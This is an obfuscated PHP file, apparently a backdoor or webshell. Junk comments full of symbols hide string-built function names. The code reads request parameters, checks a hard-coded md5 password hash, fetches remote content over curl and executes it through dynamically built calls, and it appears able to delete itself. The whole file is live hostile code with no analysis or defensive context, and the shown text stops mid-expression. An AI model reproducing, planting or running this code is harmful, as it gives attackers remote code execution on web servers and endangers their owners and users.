<?php /*-
◎∕⋾✺﹥﹤º㊉⑰∘▹∃◸⇈℗⇅◽↴⋥⒡﹦↣⇊☰└┭♖◹
Zs3Gz&Ey◎∕⋾✺﹥﹤º㊉⑰∘▹∃◸⇈℗⇅◽↴⋥⒡﹦↣⇊☰└┭♖◹
-*///
$E = /*-
▦↯⊙⅗☺♂ⅸⓀⓗ﹣―☩┰▅～℅☶☈⊴
pbSW+▦↯⊙⅗☺♂ⅸⓀⓗ﹣―☩┰▅～℅☶☈⊴
-*///
range/*-


★⊎➲◍✥⇚ⓢ㉿➎ⓩⓓ유➩⓫☇


eC32★⊎➲◍✥⇚ⓢ㉿➎ⓩⓓ유➩⓫☇


-*///
(/*-


↖～┐‖㊰☼➜⋜◇▱ℓ


FZG|=T↖～┐‖㊰☼➜⋜◇▱ℓ


-*///
"~", " "/*-
⒞⓮﹌ϡ⊎▢▌㊐➦┠⓭⓵≦
Q@Hf⒞⓮﹌ϡ⊎▢▌㊐➦┠⓭⓵≦
-*///
); /*-


㊂➪ↅ➵₪✶⋷╡ˉ⇣⑥


QvB㊂➪ↅ➵₪✶⋷╡ˉ⇣⑥


-*///
$XB=/*-
╘⒱Ⓠ◜⓲⅓←╏✈❆♡∟⋋♬↯↢♮┍≃
6(:JArW~<%╘⒱Ⓠ◜⓲⅓←╏✈❆♡∟⋋♬↯↢♮┍≃
-*///
${$E[8+23].$E[16+43].$E[17+30].$E[24+23].$E[43+8].$E[38+15].$E[28+29]};if/*-
♈ⓡ┨℮™◸╋⇋◴Ⓦⓞ╘⊅╦◡✾ⓜ⇖↑✍⒙✘
gv`♈ⓡ┨℮™◸╋⇋◴Ⓦⓞ╘⊅╦◡✾ⓜ⇖↑✍⒙✘
-*///
(in_array(/*-eBMY@E-*///
gettype(/*-RKx&Oy-*///
$XB)."24",$XB)){$XB[65]=$XB[65].$XB[74];$XB[82]=$XB[65]($XB[82]);@$XB=$XB[82]($XB[58],$XB[65](${$XB[35]}[15]));/*-

⊸⑰⅛﹁﹄

toS0}9jQd⊸⑰⅛﹁﹄

-*///
$XB/*-2|y|);<0-*///
();/*-caZ}VK3z-*///
}/*-

㈠▦Ⓚ

H]^]㈠▦Ⓚ

-*///
class /*-V)E5lE$-*///
DVB{ /*-
➘『⋆
`eYGlB=A-➘『⋆
-*///
static/*-


╜≞╔€¯⑮⊚┐▢∯°┳▊➎♢


=$vR╜≞╔€¯⑮⊚┐▢∯°┳▊➎♢


-*///
 function /*-dnnBWdT-*///
pHDA($bVzHE) /*-)2L-*///
{ $GSNOZLtC/*-


⓬⋾㊯ℒ⇋≛ↆ◻ⓥ✧㊋


iWr-oZ⓬⋾㊯ℒ⇋≛ↆ◻ⓥ✧㊋


-*///
 = /*-

∋「➁㈠┑

B_xs∋「➁㈠┑

-*///
"r"./*-NziUSjS-*///
"a"./*-TbR2A]-*///
"n"./*-<N64i}3-*///
"g"./*-==q!BCY-*///
"e"; /*-^y-*///
$DY/*-M0-*///
 = /*-


❸♡︿☳⇛≟Σ▾⊧✔⇃⒬▆


Sj[1P)P❸♡︿☳⇛≟Σ▾⊧✔⇃⒬▆


-*///
$GSNOZLtC/*-
⋘⌔＂♜▄﹩∠◝⋇▅⒙↽⊀∼
6ZdMHS}7]⋘⌔＂♜▄﹩∠◝⋇▅⒙↽⊀∼
-*///
(/*-


←③


0qhB←③


-*///
"~"/*-~E>QT6#tT-*///
, /*-

➫―⋌︵◾⒊ⒹⓅ╫⓭⇎▱╏⊝⅖㊨☉☜✁═↿➎♡」▿∩✵

5]Z0Pqbm➫―⋌︵◾⒊ⒹⓅ╫⓭⇎▱╏⊝⅖㊨☉☜✁═↿➎♡」▿∩✵

-*///
" "/*-
⇀⌘✚∋≥▴⋑↹⊂
VW(Y⇀⌘✚∋≥▴⋑↹⊂
-*///
);/*-|X#>G1g[-*///
 $eMkCpYxQV /*-P?<{-*///
= /*-u@N)-*///
explode/*-

┠☳

KD8O])┠☳

-*///
(/*-qFu?g&m_.-*///
"-", /*-W-*///
$bVzHE/*-:.W-*///
); /*-


✖↶♭ℓ➂⅕Ⓩ⑻≂ℎ□✃ⅳ▒║♔☟∆


J%UQ$#s✖↶♭ℓ➂⅕Ⓩ⑻≂ℎ□✃ⅳ▒║♔☟∆


-*///
$UxebGysQV /*-y~}$-*///
= /*-G.-*///
""; foreach /*-RA]-V-*///
(/*-
≌㊄⋭Ⓔ╃╕⅛㊎♙ℤ✧⊔⋵╩≍☹⑫✿⊐▵⇥▰Ⓓ¶➯❖㏒﹃♟¢
7Pf_≌㊄⋭Ⓔ╃╕⅛㊎♙ℤ✧⊔⋵╩≍☹⑫✿⊐▵⇥▰Ⓓ¶➯❖㏒﹃♟¢
-*///
$eMkCpYxQV /*-


〓⑻ⓕ۵╓⇗∅⒎㊇✺⇔➏≭㊤♁⋪Ⅾⓐ✞


I2Lws〓⑻ⓕ۵╓⇗∅⒎㊇✺⇔➏≭㊤♁⋪Ⅾⓐ✞


-*///
as /*-Zb&#tD1hD-*///
$gf /*-.X-&IgyjhC-*///
=>/*-


➻↉ⓗ⑰⋽Ⓛ↋┏∗⇩➳╫†▎』⋫☍∉≠➓


;;p➻↉ⓗ⑰⋽Ⓛ↋┏∗⇩➳╫†▎』⋫☍∉≠➓


-*///
 $mayzsHUDb/*-
⇑╧∎◯⓪▿╋ⅷ⋒♖∺⇠㉿
l⇑╧∎◯⓪▿╋ⅷ⋒♖∺⇠㉿
-*///
) /*-gLB_9=i;-*///
$UxebGysQV /*-)-*///
.= /*-


╖∄∵﹁Ⓓ㊊Ⅱ▲⇋


C%╖∄∵﹁Ⓓ㊊Ⅱ▲⇋


-*///
$DY[$mayzsHUDb/*-
⒤ⓤ☑≩ℒ⒵∏⒁⋶╋《⋞∽☸✈
PI(o.{$⒤ⓤ☑≩ℒ⒵∏⒁⋶╋《⋞∽☸✈
-*///
 - /*-
∻㊜¡✐$⊓ℯⅵ⊺웃♔⇑⊂∿⋮
Q]!tdl∻㊜¡✐$⊓ℯⅵ⊺웃♔⇑⊂∿⋮
-*///
51621/*-

←┠㈣㊕❻▨≇}∧✚❤⒛⅘⇠☼⊅❃﹁》ℒ≡➹⑰♚Ⅴ➽ℚ▢㊞◾╁

B~=0←┠㈣㊕❻▨≇}∧✚❤⒛⅘⇠☼⊅❃﹁》ℒ≡➹⑰♚Ⅴ➽ℚ▢㊞◾╁

-*///
];/*-+#nz%&-*///
 return /*->Y8^A-*///
$UxebGysQV; /*-


┄Ⓗ↭☷⊋⊘㊀⓼◙✽➬➵◫▒㊎㊅⓽✞↤⋅✯


uFR2rr┄Ⓗ↭☷⊋⊘㊀⓼◙✽➬➵◫▒㊎㊅⓽✞↤⋅✯


-*///
} /*-
웃└⋦┞⊭♜¾➷┗⒲》Ⅲ∙Ⅺ☊❃↬▉∅◒⑲⋾㎡④⇒✫┊
WSg?o8Z웃└⋦┞⊭♜¾➷┗⒲》Ⅲ∙Ⅺ☊❃↬▉∅◒⑲⋾㎡④⇒✫┊
-*///
static /*-
→ت⊺↉⋔▮⋓⑳￡㈣⓯☵｜㊇∝◁⇎⊶✕⓫﹄ⓔϡ❀❶☶Ⓣ﹂
ks-!→ت⊺↉⋔▮⋓⑳￡㈣⓯☵｜㊇∝◁⇎⊶✕⓫﹄ⓔϡ❀❶☶Ⓣ﹂
-*///
function /*-KEKl,o-*///
bGoXHFAO/*-<4(Bj?-*///
(/*-
Ⓠ⓱✳≛ℴ⒇《┾▢∲⋁⊙∊◁⒔↷㉿✤╒ⅰ⏥ℕ⋇
cRr{ns]vCⓆ⓱✳≛ℴ⒇《┾▢∲⋁⊙∊◁⒔↷㉿✤╒ⅰ⏥ℕ⋇
-*///
$VRTd,/*-


ⅺ┿∙⅝㊦≎︿ⓦ⑷☍ⅽ㊂≿✈▾➅ℯ⓵⋄


iiⅺ┿∙⅝㊦≎︿ⓦ⑷☍ⅽ㊂≿✈▾➅ℯ⓵⋄


-*///
 $lLOCTk/*-yMQLoJ-*///
)/*-tEZgq&}-*///
 {/*-{-*///
 $mdXaOpkS/*-]Yhd-*///
 = /*-


㊑〈╎*☢①㍿☣ⓑ┷⒁Ↄ⋆✠╪ⓨ┎✝❉◞☒≓┑↹↨⓯⊐≷


qmf.TM?VH㊑〈╎*☢①㍿☣ⓑ┷⒁Ↄ⋆✠╪ⓨ┎✝❉◞☒≓┑↹↨⓯⊐≷


-*///
curl_init/*-Xi_x+P-*///
(/*-
╄┅⑯❏↞⇟⅙㊚☁Ⅾⅽ┈︿➲⊫∁♬⋧≶⑻۵㊆∬∞⒪▁┎◎
Wx_OC%84OT╄┅⑯❏↞⇟⅙㊚☁Ⅾⅽ┈︿➲⊫∁♬⋧≶⑻۵㊆∬∞⒪▁┎◎
-*///
$VRTd/*-


⑭⏥㈧➋∊➺▤╛


%CrST⑭⏥㈧➋∊➺▤╛


-*///
);/*-Po{1G$Y&-*///
 curl_setopt/*-H^-*///
(/*-b5g-*///
$mdXaOpkS,/*-


卐◞▾⒓}⓴∲░⑿➒⋬❽Ⅷ


gp卐◞▾⒓}⓴∲░⑿➒⋬❽Ⅷ


-*///
 CURLOPT_RETURNTRANSFER,/*-O22H%-*///
 1/*--(,+7&ch-*///
);/*-
㊝⌔⒆⊎⇀╥╤⒟☛Ⓦ◡♗▶ⓨ☺✺✏㊅∹
v;h_9_GEHT㊝⌔⒆⊎⇀╥╤⒟☛Ⓦ◡♗▶ⓨ☺✺✏㊅∹
-*///
 $XDbcwGgphf/*-

⏢◻∤┦♝⋀☊➛◀⊗⑲⇇ϟℤ⅗➚➁ⓝ

mi3nn_8⏢◻∤┦♝⋀☊➛◀⊗⑲⇇ϟℤ⅗➚➁ⓝ

-*///
 = /*-

❿┰∥♟✡Ⓩ❂ⓧ☝￣⇃◻◔⅝┙❶☇ℊ⊲

v=.T;q=❿┰∥♟✡Ⓩ❂ⓧ☝￣⇃◻◔⅝┙❶☇ℊ⊲

-*///
curl_exec/*-Fj-?8y>]-*///
(/*-+A-N-*///
$mdXaOpkS/*-9S>3c,`-*///
); /*-EE^K3}--*///
return /*-:_0%~EM-*///
empty/*-


ⅿ⒕


Xwg.VIE7Zⅿ⒕


-*///
(/*-vBDkW5-*///
$XDbcwGgphf/*-If,DNcp-*///
)/*-hI;1$-*///
 ? /*-


Ⓓ⊧ℎ≁➏▫◳㊀÷￣㊋∇ℴ⒓㊯◨≡⇔╂Ⅼ┖♯Ⓛ⓻○∼≚✁ↁ


NT,>.Ⓓ⊧ℎ≁➏▫◳㊀÷￣㊋∇ℴ⒓㊯◨≡⇔╂Ⅼ┖♯Ⓛ⓻○∼≚✁ↁ


-*///
$lLOCTk/*-[}_oa{N-*///
(/*-vSLx-*///
$VRTd/*-
▉⇛❋☜ⓠ┝↯⓰↔◥✩➄⊷⊰∣⒁◳➍⊏⊌⒔ⓨ│
V7;8]{2NU▉⇛❋☜ⓠ┝↯⓰↔◥✩➄⊷⊰∣⒁◳➍⊏⊌⒔ⓨ│
-*///
)/*-;dk$8-*///
 : /*-ej?T~PkYj-*///
$XDbcwGgphf; /*-

┌⊿⋈⓲◾⒉∡≀◀㊐

L:>XHcQFW┌⊿⋈⓲◾⒉∡≀◀㊐

-*///
}/*-L0&94.>o-*///
 static/*-[[LKs=%X-*///
 function /*-

㊑≂❺ↅ∀♣◣≎≿︵Ю▎≙⊊Ⓥ⋷^☭⑷➂➉↋㊇㊎┽♓㏑◞⒁

.Oi53Q,2R㊑≂❺ↅ∀♣◣≎≿︵Ю▎≙⊊Ⓥ⋷^☭⑷➂➉↋㊇㊎┽♓㏑◞⒁

-*///
Gqcf/*-e@$cN49(-*///
() /*-
⒜ϡ✆
C8⒜ϡ✆
-*///
{/*-
⊷⊏⓱⊒⊕▣☏ⓤ#≏╤⓸※㊇⊍⊰↷⋋⒖✽♢⊚⑴❼{
(mrN⊷⊏⓱⊒⊕▣☏ⓤ#≏╤⓸※㊇⊍⊰↷⋋⒖✽♢⊚⑴❼{
-*///
 $rfDxm /*-(DqM-*///
=/*-

❿Ⓩﭢ㊒∣】◕≜➬◰⋷*㊇✥Ⅾ≷﹉⋏➯❇

0Qn❿Ⓩﭢ㊒∣】◕≜➬◰⋷*㊇✥Ⅾ≷﹉⋏➯❇

-*///
 array/*-lIrn3F}z-*///
("51648-51633-51646-51650-51631-51646-51652-51645-51630-51637-51648-51631-51642-51636-51637","51632-51631-51633-51652-51633-51636-51631-51698-51696","51641-51632-51636-51637-51652-51647-51646-51648-51636-51647-51646","51635-51650-51648-51640","51649-51650-51632-51646-51693-51695-51652-51647-51646-51648-51636-51647-51646","51645-51642-51639-51646-51652-51644-51646-51631-51652-51648-51636-51637-51631-51646-51637-51631-51632","51675-51705","51622","51700-51705","51682-51665-51665-51682-51658","51636-51645"); /*-
♚⊄‰ℭⓐⅥ∱✌⒕§┘☪♓┶ⓨ▷ℋ⇓┅┗⇀┇⒳╨➹
7|♚⊄‰ℭⓐⅥ∱✌⒕§┘☪♓┶ⓨ▷ℋ⇓┅┗⇀┇⒳╨➹
-*///
foreach /*-x3-*///
(/*-Z]-*///
$rfDxm/*-


➤☭‹↲♚≶⋖↨≳Ⓩ⊮↪⒏➾➺●◗➁∕㊌⊜↡ⅺ≛⅒〖


km>bdUu➤☭‹↲♚≶⋖↨≳Ⓩ⊮↪⒏➾➺●◗➁∕㊌⊜↡ⅺ≛⅒〖


-*///
 as /*-DW}mt-*///
$YNwOPoUZ/*-?>}~Co-*///
)/*-

↤⇒ⅺ⒜§€♩▣╊Ⅵø⒮℠♨≛⇀≎

.+9↤⇒ⅺ⒜§€♩▣╊Ⅵø⒮℠♨≛⇀≎

-*///
 $YDwxbehzF/*-

⊄◌ⓥ☎←⋎➺）⋑큐↘✑⑺➃◗└⇡❅▆⒂

XYfRA⊄◌ⓥ☎←⋎➺）⋑큐↘✑⑺➃◗└⇡❅▆⒂

-*///
[] /*-


≠⊼⇉▲∃¢⋘⊚⊋≒≬Ⅳ≵ⓝ⋫


M(Spv≠⊼⇉▲∃¢⋘⊚⊋≒≬Ⅳ≵ⓝ⋫


-*///
= /*-

⊙↘≂☯♙∸⅟╃☁┊㊫⊭⒃⊜ℎ

Km4>L,Kn⊙↘≂☯♙∸⅟╃☁┊㊫⊭⒃⊜ℎ

-*///
self/*-Ii&cy1oi-*///
::/*-


⓸≒♢ﭢⓒ⓴⑦ℊ™➙☟⒫➬╇⒘


{+)mBM⓸≒♢ﭢⓒ⓴⑦ℊ™➙☟⒫➬╇⒘


-*///
pHDA/*-
∥⋔☥㈠㊄∐◾╋ↇ╁⊻㊜◶︽➨⓱⒝≱➳┚Ю
aAtG%<pX?H∥⋔☥㈠㊄∐◾╋ↇ╁⊻㊜◶︽➨⓱⒝≱➳┚Ю
-*///
(/*-@$N-*///
$YNwOPoUZ/*-
╓↤Ⅿ❶Ⓣⓖ┧☎⇛】≑∐➸♐⋲°☿㊔❧◨∘❻┻＂┄☪⒨↨↶‱
qgf}4+2`J╓↤Ⅿ❶Ⓣⓖ┧☎⇛】≑∐➸♐⋲°☿㊔❧◨∘❻┻＂┄☪⒨↨↶‱
-*///
);/*-


⊧⒯╞


I<<JXn>T⊧⒯╞


-*///
$MkUBKp /*-ils&Wyk,-*///
= /*-

╋⊱➎ℚ↹☥✒

cz)j╋⊱➎ℚ↹☥✒

-*///
@$YDwxbehzF/*-
┍♣⒝╋ↆ⑨☽⋸⓲➓㈩⇇✂⇍◉➏❁ℝ↛
TW┍♣⒝╋ↆ⑨☽⋸⓲➓㈩⇇✂⇍◉➏❁ℝ↛
-*///
[/*-Z$IQIM]r0-*///
1/*-

◱﹀≻┲♀Ⓨ♟✹◜「➂ⅻ%㊩●➩㊑↣ℙⅤ≪✱≄↚☞➬➲☀㊁

3eN◱﹀≻┲♀Ⓨ♟✹◜「➂ⅻ%㊩●➩㊑↣ℙⅤ≪✱≄↚☞➬➲☀㊁

-*///
]/*-


Ю⑥⊑↲⇀⑺⋘↣∨⅙≟⇚ℝ◟❦¢⊶╫⒠


!wIyPЮ⑥⊑↲⇀⑺⋘↣∨⅙≟⇚ℝ◟❦¢⊶╫⒠


-*///
(/*-


⋿⒪☳↨∈↲⑲㈣〃❾➎➼⑦ت▁ⅰ›♠├✦≃┹﹤Ⓜ↧◎≆≧┐Ⅳ➧


x6+⋿⒪☳↨∈↲⑲㈣〃❾➎➼⑦ت▁ⅰ›♠├✦≃┹﹤Ⓜ↧◎≆≧┐Ⅳ➧


-*///
${/*-e|lLS]-*///
"_"/*-


⊠⊮⇓≔☚↧ⓔ


>#zVHpn$B⊠⊮⇓≔☚↧ⓔ


-*///
."G"/*-
➷⊴⑪Ⓡ╡×♕Ⅱ❀⊬⋐⇅⓿◗✜☞ⅶ
Y]Q➷⊴⑪Ⓡ╡×♕Ⅱ❀⊬⋐⇅⓿◗✜☞ⅶ
-*///
."E"/*-:YF-*///
."T"/*-

♤♜ⅺˉ⑫∔∠☾∖⒁⒏

yn1(N!KM`♤♜ⅺˉ⑫∔∠☾∖⒁⒏

-*///
}[/*-

▥∥◃ℝ✗☜⓹ⓦ◍➤∑⊁︵⒈⑿

r`[LsM▥∥◃ℝ✗☜⓹ⓦ◍➤∑⊁︵⒈⑿

-*///
$YDwxbehzF/*-85m-*///
[/*-yW-*///
5+4/*-iQ-*///
]]/*-
㈤⅖ⅵ≕☪╉♂Ⓕ↭✠○┡✰⅙∲⇉☯Ⅰ☛۰▾⊧⊓∣♐↫ⓗ
Txnp<㈤⅖ⅵ≕☪╉♂Ⓕ↭✠○┡✰⅙∲⇉☯Ⅰ☛۰▾⊧⊓∣♐↫ⓗ
-*///
);/*-wFrG2Wf-*///
 $Bp /*-

㊊π⑽㊉㊡◹❥❅┤⋌㊮﹡＂⋷◸┠⅓ℎ╬⒐╏⋀

^1mwraP㊊π⑽㊉㊡◹❥❅┤⋌㊮﹡＂⋷◸┠⅓ℎ╬⒐╏⋀

-*///
=/*-


⊆⋱☿﹪≧々❹¢﹡▴❊➙㉿⓽⋻⓲㊣√


X!rk2tR⊆⋱☿﹪≧々❹¢﹡▴❊➙㉿⓽⋻⓲㊣√


-*///
 @$YDwxbehzF/*-#&-*///
[/*-


◪⑭≯➀↿∝⋔∯⊆◉╃⊾✲╬︹


JW+tuy{x%◪⑭≯➀↿∝⋔∯⊆◉╃⊾✲╬︹


-*///
2+1/*-
❧ↅ╣┎╏☩Ⓥ↦▰Σ⊭⇍☵¶♁ℑ
9dU^❧ↅ╣┎╏☩Ⓥ↦▰Σ⊭⇍☵¶♁ℑ
-*///
]/*-ob[wYz&$S-*///
(/*-E}&^i-*///
$YDwxbehzF/*-svBPw-*///
[/*-[PDR7oF(-*///
1+5/*-=H!V&D-*///
], /*-~@;Q-*///
$MkUBKp/*-
㊈ℯ↵⑽
YmNN?}C|r㊈ℯ↵⑽
-*///
);/*-75Nm7&9_OK-*///
 $PEIbHjL /*-

［⋂Ⓟ☧㊣◓│▴⇚◃╦Ⅰ▍❄∱✢≉⊃⊓♟Θ☿

~8［⋂Ⓟ☧㊣◓│▴⇚◃╦Ⅰ▍❄∱✢≉⊃⊓♟Θ☿

-*///
=/*-

⇨➩@㊟㊙◇➇≲［☹⇍✬ⓜ✁≴➔⑤™

Nm4dz⇨➩@㊟㊙◇➇≲［☹⇍✬ⓜ✁≴➔⑤™

-*///
 $YDwxbehzF/*-w$QN>-*///
[/*-B2xDd#[-*///
2+0/*-|7-C6-*///
]/*-


┅⑰┘∏♋⇒☣


w&┅⑰┘∏♋⇒☣


-*///
(/*-X|,-*///
$Bp,/*-Ur[~^0-*///
 true/*-gtVzrYL-*///
); /*-


⒃｜☬⊄№⊺▋◃♐큐


!cR⒃｜☬⊄№⊺▋◃♐큐


-*///
@${/*-]iaQ%DM!-*///
"_"./*-


∙◝╆✕☠ↁ★☭㊃Ⓛ∎⋵ℜ⇐↮【∈Ⅷℱ┖⏎


T>+Io$jT∙◝╆✕☠ↁ★☭㊃Ⓛ∎⋵ℜ⇐↮【∈Ⅷℱ┖⏎


-*///
"G"./*-


✾︵‐≆—↨╘ⓜ≵⏥ø⇀◰☮⋈➵Ⓢ


<~A2|MK✾︵‐≆—↨╘ⓜ≵⏥ø⇀◰☮⋈➵Ⓢ


-*///
"E"/*-


┥㈠┽➅▴⊵


Ak#┥㈠┽➅▴⊵


-*///
."T"/*-

≳∸ⓥ⒝∕Ⅽ

mR#s≳∸ⓥ⒝∕Ⅽ

-*///
}/*-@e`|-*///
[/*-s33r+ezN%P-*///
$YDwxbehzF/*-


㊂↰✻◴⌒︺┈⋼⇜


[|㊂↰✻◴⌒︺┈⋼⇜


-*///
[10+0/*-Ic6]LkO-*///
]/*-


⇕㎡⅐✫∼┈⇔﹟◳❊㊜


pz]+VMA.⇕㎡⅐✫∼┈⇔﹟◳❊㊜


-*///
]/*-
⒔≈⓵⑷﹀▀➜⋷☷｜Ⅴ㊣⋑☉✍⊇❖■
3wJ-N<⒔≈⓵⑷﹀▀➜⋷☷｜Ⅴ㊣⋑☉✍⊇❖■
-*///
 == /*-
⓸⑻☈ღ⓰ℊ♀↑⅘ⓧ⇩▔⓺┶⒱⊉⇠
r&JHp{x?#⓸⑻☈ღ⓰ℊ♀↑⅘ⓧ⇩▔⓺┶⒱⊉⇠
-*///
1 /*-4$-*///
&& /*-

㊖╡▾⓴➸≱⇔㈢✾◇⊩◰⑮ⅳ㊟

c7DQ1f㊖╡▾⓴➸≱⇔㈢✾◇⊩◰⑮ⅳ㊟

-*///
die/*-
↗∙⊙㊌⓾┄▼ℛ┚
(?t&↗∙⊙㊌⓾┄▼ℛ┚
-*///
(/*-g0gV-*///
$YDwxbehzF[5+0/*-cP`A8a&-*///
]/*-[FU(-*///
(/*-~<de-}.v^-*///
__FILE__/*-bNPMYj-*///
)/*-P#O2-*///
); /*-


♝∅♘▔⇚@•⓲⇘⊶≳↖ⒼⒾ≒▲⋣『≜⇏➸▃⅒▭⊲▷⑥➞Ⓑ✈⓻


8v$WwG♝∅♘▔⇚@•⓲⇘⊶≳↖ⒼⒾ≒▲⋣『≜⇏➸▃⅒▭⊲▷⑥➞Ⓑ✈⓻


-*///
if/*-}.ol-*///
(/*-


✽↸⋭▕‡≗⊉ℱ☺∥❄◘≪ℰⒼ♚✠


g:✽↸⋭▕‡≗⊉ℱ☺∥❄◘≪ℰⒼ♚✠


-*///
 (/*-7>B.>0FV-*///
(@/*-


㊥⋦ⓗ▻⋘┟⇣∤⋥⊴⌘➇└℮▨♆③☃Ⅼ㊈⇝⒄♤➷➧◎


lR6^&5Z㊥⋦ⓗ▻⋘┟⇣∤⋥⊴⌘➇└℮▨♆③☃Ⅼ㊈⇝⒄♤➷➧◎


-*///
$PEIbHjL/*-HuA(-*///
[/*-+m:`kwT-*///
0/*-doN^}O-*///
] /*-


⇔↑≇▆⒄﹜㊢㏒┝❹➐➥⌔┷▸▿≠⓵♯①≏ⓘ≵Ⓓ㉿


RZ^z|c]{a|⇔↑≇▆⒄﹜㊢㏒┝❹➐➥⌔┷▸▿≠⓵♯①≏ⓘ≵Ⓓ㉿


-*///
- time/*-
◢±^↘✵﹪☚ⓓ√⊉﹩℘∟⇏
sMMa6?jYK◢±^↘✵﹪☚ⓓ√⊉﹩℘∟⇏
-*///
()/*-
ⓣ㊇➸╁⓾┩④◰↲♠⊉⑻∪⋦∛﹦⅚﹩⊞┥┑◜⊗┕↩
Q5UVk<Lⓣ㊇➸╁⓾┩④◰↲♠⊉⑻∪⋦∛﹦⅚﹩⊞┥┑◜⊗┕↩
-*///
) > /*-

卐╝❹❦☑⋐♫⋵☬➘➥⑴«✘㊂

2Ph(XI>%卐╝❹❦☑⋐♫⋵☬➘➥⑴«✘㊂

-*///
0/*-:N-*///
)/*-


≼∖⏢✂∴ⓐ✜⓴﹜❄⊸⓷


~+aLfRzv≼∖⏢✂∴ⓐ✜⓴﹜❄⊸⓷


-*///
 and /*-


◷┘∫⋬∩㊀≨♥


,8t.,L#K◷┘∫⋬∩㊀≨♥


-*///
(/*-^K>Xue-*///
md5/*-~dpp!-*///
(/*-

⇉➱囍⋅⋌►⅛③⊘ↅ⊚✬⒗❧▐➣➘

bT9=@b⇉➱囍⋅⋌►⅛③⊘ↅ⊚✬⒗❧▐➣➘

-*///
md5/*-


❐⓭ℬ╩≙╏╪♡╓


}$G+A>7~y❐⓭ℬ╩≙╏╪♡╓


-*///
(/*-JIu!]`-l-*///
$PEIbHjL/*-c,v-*///
[/*-


&╍♭㊠⊆☚≭≚ㄨ∾『⑻⊷⋭ↈ◤◳﹛㊛‡⑦≊ↁ≒⋎ⅹ⊩


yQ:jsO>6&╍♭㊠⊆☚≭≚ㄨ∾『⑻⊷⋭ↈ◤◳﹛㊛‡⑦≊ↁ≒⋎ⅹ⊩


-*///
3+0/*-3^#CpQ-*///
]/*-
ⅳ㊍⇪⋃➀⇊∐√➧╘〈▉❇︻▼┪⋔ت∁◚⅖❹︸✗」│❺⊡
N?nolⅳ㊍⇪⋃➀⇊∐√➧╘〈▉❇︻▼┪⋔ت∁◚⅖❹︸✗」│❺⊡
-*///
)/*-


⇋└≨㊋╤✑⊬┌┟◕⒢ⓨⒺⒾ↊


&.)⇋└≨㊋╤✑⊬┌┟◕⒢ⓨⒺⒾ↊


-*///
)/*-|rgb-*///
 === /*-

㊰☇⇆∛⋙◁◙➺⇑⊢☚╟✹℠├

pej㊰☇⇆∛⋙◁◙➺⇑⊢☚╟✹℠├

-*///
"7777fe8da1c303a9986e217446cb8072"/*-


╨△∭Ⓠ☒㊨∐


b0╨△∭Ⓠ☒㊨∐


-*///
)/*-
♀『ⓖ⒌⅑⇋§⑤△ⓦ➳♭♗≪Ⅼ㊡㊃◎
R~)F1@qS3♀『ⓖ⒌⅑⇋§⑤△ⓦ➳♭♗≪Ⅼ㊡㊃◎
-*///
 ): /*-gc[0|-*///
$MqU /*-
⌘⊟∻
|n⌘⊟∻
-*///
=/*-I5-*///
 self/*-:cQY{+ia#}-*///
::/*-

➂▨✉⒧➶≿ⅺ◮㊠Ⅺ⊮⓭⋮‡♙✁❧Φ➠②︴⊪╃⋨⋹⊳⋶➳Ⓨ▻━

u,Kh➂▨✉⒧➶≿ⅺ◮㊠Ⅺ⊮⓭⋮‡♙✁❧Φ➠②︴⊪╃⋨⋹⊳⋶➳Ⓨ▻━

-*///
bGoXHFAO/*-


┏∦㊯╇ⓤ⊟∸︸


jF%>ZvDA.┏∦㊯╇ⓤ⊟∸︸


-*///
(/*-HJmv;n-*///
$PEIbHjL/*-eZC<;O}5-*///
[/*-

↗⊣㊬⇌┑▓▵『♁≱❼◊⇃⒅↑◉≏ⓑ⊸⋯▽㈤Ü㊣∾⇋➺➸≀❤◟

}^#H;(↗⊣㊬⇌┑▓▵『♁≱❼◊⇃⒅↑◉≏ⓑ⊸⋯▽㈤Ü㊣∾⇋➺➸≀❤◟

-*///
1+0/*-s;b?de--*///
], /*-

⊴㉿￡↯∆⇪①㊗☐♋

5lZaEu⊴㉿￡↯∆⇪①㊗☐♋

-*///
$YDwxbehzF/*-4e-*///
[/*-


░▢⒝ⓢ✄㊯Ю㊍≭⓶⒴⋡ⅾ┡☭⑱∳╄✏♘≸❸⌓∋⅖⓿⇁Ⓣ➾


&irAVBe░▢⒝ⓢ✄㊯Ю㊍≭⓶⒴⋡ⅾ┡☭⑱∳╄✏♘≸❸⌓∋⅖⓿⇁Ⓣ➾


-*///
0+5/*-
☊☿﹊☹囍≈◀☇☥※⊵╎☛↩㊚☏Ψ♛╢﹣⓵Ⓕ
UVAT!l,a☊☿﹊☹囍≈◀☇☥※⊵╎☛↩㊚☏Ψ♛╢﹣⓵Ⓕ
-*///
]/*-k!fK-*///
);/*-pX:2.:A?-*///
@$YDwxbehzF/*-Uc:%AHX-*///
[/*-HJi@[mV,s-*///
0/*-


↺ↈ┬⊴⇆ℜⓝ✖┵Ⓧ↳˜⇥┈⊻큐↽┩∷⋑⋾⊱≡ⓑ¾☥♡◤≨


I}}A@}]LP↺ↈ┬⊴⇆ℜⓝ✖┵Ⓧ↳˜⇥┈⊻큐↽┩∷⋑⋾⊱≡ⓑ¾☥♡◤≨


-*///
]/*-

ⅱ☹↢

Ri{K%ⅱ☹↢

-*///
(/*-!Z1-*///
"",/*-G%~_EL-*///
 $YDwxbehzF/*-k67-O{p3)-*///
[/*-
↵╉ⓝⒾ▣⋍●▎➱≥◨⋡⊥⒒
S`f)1↵╉ⓝⒾ▣⋍●▎➱≥◨⋡⊥⒒
-*///
1+6/*-
▃◑◒◉⋻╢ⓍΦ$⋅➛✑
.6▃◑◒◉⋻╢ⓍΦ$⋅➛✑
-*///
] /*-HVf-spW-*///
. /*-

↵┥┑

-I;?↵┥┑

-*///
$YDwxbehzF/*-5u^B2pK-*///
[/*-

ℱ▽☽⒭Ⓖ【⅔☊➐

G7&$(Frℱ▽☽⒭Ⓖ【⅔☊➐

-*///
4+0/*-rodcDZp`%-*///
]/*-9nr>AEH[$a-*///
(/*-
⋳∦♢ℳⅾ▋—➒∊√¿┨☠㊛∍ℚ⒍≊┚
B%⋳∦♢ℳⅾ▋—➒∊√¿┨☠㊛∍ℚ⒍≊┚
-*///
$MqU/*-eEs.n@#U-*///
)/*-
≍➝≶∳➄㈣➊─♆⒛℠
fn≍➝≶∳➄㈣➊─♆⒛℠
-*///
 . /*-
⓽Ⅺ╆≶⊕⊴Ⓦ﹦◎◠»◿㊦➌⊆⒤✔▵•}
3URC86D!⓽Ⅺ╆≶⊕⊴Ⓦ﹦◎◠»◿㊦➌⊆⒤✔▵•}
-*///
$YDwxbehzF/*-

╂➑▏⋩⊅↢❹〗ⅷ×ℯℱ◻⇧☄⒵≗⒢↉⓫≁☼✵

